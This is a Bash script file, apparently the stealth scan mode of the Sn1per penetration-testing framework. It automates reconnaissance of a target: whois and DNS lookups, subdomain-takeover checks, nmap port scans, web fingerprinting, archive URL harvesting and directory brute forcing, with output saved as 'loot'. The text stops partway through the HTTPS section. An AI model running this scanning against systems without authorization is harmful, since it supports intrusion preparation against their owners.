echo -e "$OKRED ./ ____'\."
echo -e "$OKRED ./ < '\."
echo -e "$OKRED \-------\ '> '\."
echo -e "$OKRED '\=====> ___< '\."
echo -e "$OKRED ./-----/ __________'\."
echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\'
echo -e "$OKRED '\=====> < ./'"
echo -e "$OKRED ./-----/ '> ./"
echo -e "$OKRED \. ___< ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./ Carl Pilcher"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED \. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\/"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[ Launching stealth scan: $TARGET $RESET"
echo -e "$OKGREEN $RESET"
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_stealth.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$WHOIS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
fi
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
mv -f *_ips.txt $LOOT_DIR/ips/ 2>/dev/null
if [[ $SCAN_TYPE == "DOMAIN" ]];
then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
echo ""
fi
source $INSTALL_DIR/modes/osint.sh
source $INSTALL_DIR/modes/recon.sh
cd $INSTALL_DIR
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -p $QUICK_PORTS $NMAP_OPTIONS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
fi
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$HTTP_PROBE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP PROBE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" | fprobe -c 200 -p xlarge | tee $LOOT_DIR/web/httprobe-$TARGET.txt 2> /dev/null
echo "$TARGET" | fprobe -c 200 -p xlarge -v | tee $LOOT_DIR/web/httprobe-$TARGET-verbose.txt 2> /dev/null
fi
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
if [[ -z "$port_80" ]];
then
echo -e "$OKRED + -- --=[ Port 80 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[ Port 80 opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
if [[ "$WAFWOOF" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
fi
if [[ "$WIG" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-http 2> /dev/null
fi
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
echo " "
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau --subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u http://$TARGET:80 -l 1 -v n
cp -f /usr/share/blackwidow/"$TARGET"_80/"$TARGET"_80-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
if [[ "$WEB_BRUTE_STEALTHSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-stealth.txt
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
egrep -v '<|>|;|(|)' $LOOT_DIR/web/robots-$TARGET-http.txt | tee $LOOT_DIR/web/robots-$TARGET-http.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:80
fi
fi
if [[ -z "$port_443" ]];
then
echo -e "$OKRED + -- --=[ Port 443 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[ Port 443 opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null
if [[ "$WAFWOOF" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
rm -f $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https.raw > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
fi
if [[ "$WIG" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-https 2> /dev/null
fi
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt
fi
if [[ "$PASSIVE_SPIDER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
